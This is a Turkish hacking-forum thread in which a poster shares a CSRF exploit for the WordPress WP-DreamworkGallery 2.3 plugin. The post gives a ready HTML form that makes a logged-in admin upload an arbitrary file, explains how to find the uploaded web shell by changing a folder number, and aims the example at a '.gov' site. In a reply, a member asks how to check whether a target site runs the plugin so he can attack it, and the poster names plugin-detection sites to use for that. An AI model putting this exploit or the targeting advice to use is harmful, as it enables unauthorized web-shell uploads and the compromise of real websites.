İPUCU

THT Gövde Gösterisi BugBounty & Exploit Çalışmalarınızı Sergileyebileceğiniz Bölüm

Seçenekler

WordPress WP-DreamworkGallery 2.3 CSRF Backdoor / SultanATSIZ / Anka Tim

06-03-2019 13:28
#1
Üyelik tarihi:
01/2018
Yaş:
22
Mesajlar:
1.499
Teşekkür (Etti):
1721
Teşekkür (Aldı):
761
Konular:
123

Videoda Kullanılan CSRF Kodları

Kod:
<html>
<body>
<form action="http://www.[VULNERABLESITE].gov/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload for WordPress WP DreamWorkGallery" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload for WordPress WP DreamWorkGallery" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Not: Eğer shelliniz http:// hedefsite.com/wp-content/uploads/dreamwork/1_uploadfolder/big/shelladı.php dizinde yoksa uploadfolder den önceki 1 olan sayıyı 2,3,4 gibi değiştirerek shellinize ulaşabilirsiniz.

Exploit

https://cxsecurity.com/issue/WLB-2019030042
Kullanıcı İmzası
Eski Anka(Saldırı Timi) Üyesi (Tümgeneral)
IThe3ndI, M3m0ry Teşekkür etti.

06-03-2019 16:13
#2
IThe3ndI - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2015
Mesajlar:
31
Teşekkür (Etti):
169
Teşekkür (Aldı):
32
Konular:
14
hedef bir sitede denemek istiyorum hocam sitede bu eklentinin olup olmadığını bilmiyorum eklenti var mı yok mu nasıl bakarım hocam.
Kullanıcı İmzası
Siz Geceleri Uykunuzdayken, Biz Klavyelerimizin Basinda sizinle uğraşıyoruz.
06-03-2019 21:47
#3
Üyelik tarihi:
01/2018
Yaş:
22
Mesajlar:
1.499
Teşekkür (Etti):
1721
Teşekkür (Aldı):
761
Konular:
123
Alıntı:
IThe3ndI´isimli üyeden Alıntı Mesajı göster
hedef bir sitede denemek istiyorum hocam sitede bu eklentinin olup olmadığını bilmiyorum eklenti var mı yok mu nasıl bakarım hocam.
Alttaki 2 site tema ve eklentisi tespiti yapıyor bazen yanlış çıksada doğruluk payıda var hedef siteye uygula aynı eklenti kurulu ise hedef siteye de denersin.

https://whatwpthemeisthat.com/
https://www.wpthemedetector.com/
Kullanıcı İmzası
Eski Anka(Saldırı Timi) Üyesi (Tümgeneral)

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var
Sizin Konu Yanıtlama Yetkiniz var
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı